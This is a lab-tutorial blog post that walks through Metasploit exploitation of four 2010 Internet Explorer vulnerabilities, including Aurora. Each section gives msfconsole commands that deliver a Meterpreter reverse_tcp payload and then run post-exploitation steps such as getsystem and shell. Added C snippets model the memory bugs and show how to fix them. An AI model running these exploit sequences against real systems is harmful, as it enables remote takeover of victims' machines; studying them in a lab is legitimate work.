Posts tagged Internet Explorer
Metasploit Exploitation Scenarios – Scenario 1
Here is the first scenario of the Metasploit Exploitation Scenarios series. Below you will find a SlideShare presentation and a YouTube video demonstrating the scenario. If you have any comments or suggestions, don't hesitate.
MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption
PoC provided by :
unknown
Matteo Memelli
jduck
Reference(s) :
CVE-2010-3962
MSA-2458511
MS10-090
Affected version(s) :
Internet Explorer 6, 7 & 8
Tested on Windows XP SP3 with :
Internet Explorer 6 (mshtml.dll 6.0.2900.5512)
Description :
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems that Microsoft's code inadvertently increments a vtable pointer so that it points to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the value read at "[vtable+0x30+1]". The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable: specifically, those where the resulting program counter lands within another module, in kernel space, or at an address that cannot be reached with the various memory-spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.
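To make the "[vtable+0x30+1]" remark concrete, here is an added example (not code from the original post, from mshtml, or from the Metasploit module) that models the misaligned read on a constructed 32-bit vtable. The slot addresses, the module range 0x7E4xxxxx and the spray window are all made up; the point is that the value the CPU loads is a byte-shifted blend of two adjacent slots, so it changes with every build of the library and cannot be steered by the attacker.

```c
/* Added example: models the off-by-one vtable read described above.
 * Not mshtml's code; all addresses are constructed for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define VTABLE_SLOTS 16

/* Read a 32-bit little-endian value at an arbitrary byte offset into the
 * vtable, as an x86 CPU does when it loads a function pointer from a
 * misaligned address. memcpy keeps the access well defined in C. */
uint32_t read_slot_at_byte_offset(const uint32_t *vtable, size_t byte_off)
{
    const unsigned char *raw = (const unsigned char *)vtable;
    uint32_t v;
    memcpy(&v, raw + byte_off, sizeof v);
    return v;  /* assumes a little-endian host, as on x86 */
}

/* The faulty increment: the vtable pointer is bumped by one byte, so the
 * call through slot 0x30 actually loads [vtable+0x30+1]. */
uint32_t effective_call_target(const uint32_t *vtable)
{
    return read_slot_at_byte_offset(vtable, 0x30 + 1);
}

/* A heap spray only helps if the blended value happens to land in it. */
int in_spray_window(uint32_t target, uint32_t lo, uint32_t hi)
{
    return target >= lo && target < hi;
}

/* Constructed vtable for one imaginary mshtml build: slot i holds an
 * address in a fictitious 0x7E4xxxxx module range. */
void build_sample_vtable(uint32_t *vtable)
{
    for (size_t i = 0; i < VTABLE_SLOTS; i++)
        vtable[i] = 0x7E400000u + (uint32_t)(i * 0x1000u);
}

int main(void)
{
    uint32_t vtable[VTABLE_SLOTS];
    build_sample_vtable(vtable);
    uint32_t target = effective_call_target(vtable);

    printf("slot 0x30 holds 0x%08x, next slot holds 0x%08x\n",
           vtable[0x30 / 4], vtable[0x30 / 4 + 1]);
    printf("misaligned read gives EIP = 0x%08x\n", target);
    printf("inside constructed spray window 0x0C000000-0x0D000000: %s\n",
           in_spray_window(target, 0x0C000000u, 0x0D000000u) ? "yes" : "no");
    return 0;
}
```

With the constructed slots 0x7E40C000 and 0x7E40D000 the loaded value is 0x007E40C0: the top byte of the first slot is lost and the low byte of the next slot is pulled in, which here lands in low user-space memory that neither the module nor a spray covers. Another build with different slot contents gives a different, equally uncontrollable value, which is why the module's reliability is per-version.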
Commands :
use exploit/windows/browser/ms10_xxx_ie_css_clip
set SRVHOST 192.168.178.21
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
getsystem
shell
MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free
Timeline :
Microsoft Security Advisory 981374 released on 2010-03-09
Exploit-DB PoC provided by Trancer on 2010-03-10
Metasploit PoC provided by jduck on 2010-03-10
Microsoft patch "KB980182" provided on 2010-03-30
PoC provided by :
unknown
Trancer
Nanika
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround of blocking access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which ends up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up in a call to PlainRelease which derefs the reference and cleans the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
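The aliasing problem in that quote (source and destination are the same variant, and the destination is cleared before the source is read) is easy to reproduce in a small refcounted model. The following is an added example, not code from the original post, from mshtml or from COM: the types and the function names variant_change_type_buggy and variant_change_type_safe are illustrative, and the object carries a "freed" flag so the use-after-release is detected instead of crashing.

```c
/* Added example: a refcounted "variant" model of the aliased
 * VariantChangeTypeEx call described above. Not the real COM code. */
#include <stdio.h>
#include <string.h>

enum vtype { VT_EMPTY_T = 0, VT_BSTR_T = 8, VT_DISPATCH_T = 9 };

/* Fake IDispatch-like object: refcount plus a flag that stands in for
 * the memory actually being returned to the heap. */
struct object {
    int refcount;
    int freed;
    char name[32];
};

struct variant {
    enum vtype vt;
    struct object *disp;   /* owned reference when vt == VT_DISPATCH_T */
    char str[32];          /* payload when vt == VT_BSTR_T */
};

static void object_release(struct object *o)
{
    if (--o->refcount == 0)
        o->freed = 1;      /* the real PlainRelease would free it here */
}

/* VariantClear-like: drop whatever the variant owns. */
static void variant_clear(struct variant *v)
{
    if (v->vt == VT_DISPATCH_T && v->disp)
        object_release(v->disp);
    v->vt = VT_EMPTY_T;
    v->disp = NULL;
}

/* Buggy order: clear dst, then read src. With dst == src the clear
 * releases the very object about to be used. Returns 0 on success,
 * -1 when it would have touched a released object. */
int variant_change_type_buggy(struct variant *dst, struct variant *src)
{
    struct object *o = src->disp;  /* pointer kept across the clear */
    variant_clear(dst);
    if (o == NULL || o->freed)     /* reading o->name here is the UAF */
        return -1;
    dst->vt = VT_BSTR_T;
    strcpy(dst->str, o->name);
    return 0;
}

/* Guarded order: convert into a temporary first, clear dst only once
 * nothing depends on the source object any more, then move it in. */
int variant_change_type_safe(struct variant *dst, struct variant *src)
{
    struct variant tmp;
    memset(&tmp, 0, sizeof tmp);
    if (src->vt != VT_DISPATCH_T || src->disp == NULL || src->disp->freed)
        return -1;
    tmp.vt = VT_BSTR_T;
    strcpy(tmp.str, src->disp->name);
    variant_clear(dst);
    *dst = tmp;
    return 0;
}

/* Run a converter with source and destination aliased, which is the
 * shape of the persist-through-setAttribute call in the quote. */
int run_aliased(int (*convert)(struct variant *, struct variant *))
{
    struct object obj = { 1, 0, "peer" };
    struct variant v = { VT_DISPATCH_T, &obj, "" };
    return convert(&v, &v);
}

int main(void)
{
    printf("buggy converter, aliased variant: %s\n",
           run_aliased(variant_change_type_buggy) == 0 ? "ok" : "use after release");
    printf("guarded converter, aliased variant: %s\n",
           run_aliased(variant_change_type_safe) == 0 ? "ok" : "use after release");
    return 0;
}
```

The fix is an ordering fix, not a check on the caller: as long as the conversion finishes reading from the source before the destination's reference is dropped, the aliased case is harmless. In the real browser the freed slot is the one a heap spray then refills, which is what turns this release into code execution.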
Commands :
use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
Timeline :
Vulnerability privately disclosed to Microsoft by ZDI on 2009-10-20
Microsoft patch "KB980182" provided on 2010-03-30
Metasploit PoC provided by jduck on 2010-04-05
PoC provided by :
Anonymous
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the "DataURL" parameter of this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control-flow data on the stack, an attacker can execute arbitrary code.
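The single out-of-bounds NUL byte is the classic off-by-one terminator. As an added example (not code from the original post or from the Tabular Data Control), the constructed frame below places a sentinel byte right after a fixed-size buffer to stand in for whatever stack data sat next to the real array; set_data_url_buggy and set_data_url_safe are illustrative names, not the control's own.

```c
/* Added example: off-by-one NUL terminator next to a sentinel byte.
 * Constructed layout, not the real control's stack frame. */
#include <stdio.h>
#include <string.h>

#define DATAURL_MAX 16

struct param_frame {
    char data_url[DATAURL_MAX];
    unsigned char sentinel;   /* stands in for adjacent control-flow data */
};

/* Buggy: caps the copy at DATAURL_MAX bytes but still writes the
 * terminator at buf[len], which is buf[DATAURL_MAX] for an input of
 * exactly that length: one NUL byte past the end of the array. */
void set_data_url_buggy(struct param_frame *f, const char *value)
{
    size_t len = strlen(value);
    if (len > DATAURL_MAX)
        len = DATAURL_MAX;
    memcpy(f->data_url, value, len);
    f->data_url[len] = '\0';   /* off by one when len == DATAURL_MAX */
}

/* Fixed: reserve room for the terminator before copying, and reject
 * over-long input instead of truncating it silently. */
int set_data_url_safe(struct param_frame *f, const char *value)
{
    size_t len = strlen(value);
    if (len >= DATAURL_MAX)
        return -1;
    memcpy(f->data_url, value, len);
    f->data_url[len] = '\0';
    return 0;
}

/* Prepare a frame with a known sentinel so clobbering is observable. */
void frame_init(struct param_frame *f)
{
    memset(f, 0, sizeof *f);
    f->sentinel = 0xAA;
}

/* 1 if the byte after the buffer no longer holds its original value. */
int sentinel_clobbered(const struct param_frame *f)
{
    return f->sentinel != 0xAA;
}

int main(void)
{
    /* Constructed input: exactly DATAURL_MAX characters. */
    const char *full = "0123456789ABCDEF";
    struct param_frame f;

    frame_init(&f);
    set_data_url_buggy(&f, full);
    printf("buggy setter, 16-byte value: sentinel %s\n",
           sentinel_clobbered(&f) ? "overwritten with 0x00" : "intact");

    frame_init(&f);
    printf("safe setter, 16-byte value: %s, sentinel %s\n",
           set_data_url_safe(&f, full) == 0 ? "accepted" : "rejected",
           sentinel_clobbered(&f) ? "overwritten" : "intact");
    return 0;
}
```

A NUL written into the low byte of a saved frame pointer or return address is enough to redirect execution into attacker-controlled stack data, which is why the module targets control-flow data rather than needing a full overflow.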
Commands :
use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
MS10-002 : Internet Explorer Aurora Memory Corruption
Timeline :
Microsoft learned of the vulnerability on 2010-01-13
Metasploit PoC provided by hdm on 2010-01-15
Exploit-DB PoC provided by Ahmed Obied on 2010-01-17
Microsoft patch "KB978207" provided on 2010-01-21
PoC provided by :
unknown
hdm
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB978207
Description :
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that led to the compromise of a number of high-profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited.
Commands :
use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig